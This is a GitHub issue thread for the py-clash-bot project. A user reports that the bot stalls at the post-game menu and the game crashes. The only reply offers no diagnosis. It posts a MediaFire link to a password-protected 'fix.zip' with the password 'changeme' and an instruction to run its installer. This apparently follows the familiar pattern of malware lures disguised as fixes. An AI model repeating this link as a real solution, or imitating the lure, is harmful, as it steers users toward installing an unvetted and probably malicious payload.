### ISSUE TITLE
Game crashing/rebooting after every game because stuck at menu open

### ISSUE THREAD

**Issue by aechemm** [pyclashbot/py-clash-bot#429]
**Describe the bug**
After each game it opens the menu and sits there, then crashes and reboots... in the logs it says it waited too long for menu to open, so it isn't seeing the menu for some reason

**To Reproduce**
1. Set bot to go
2. wait for it to win/lose
3. watch it open menu and crash

**Expected behavior**

**Screenshots**

**Desktop (please complete the following information):**
 - OS: Windows 11 running Memu Play
 - Display resolution: [e.g. 1920x1080]
 - Version [e.g. 1.1.0 or master]

**Additional context**

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
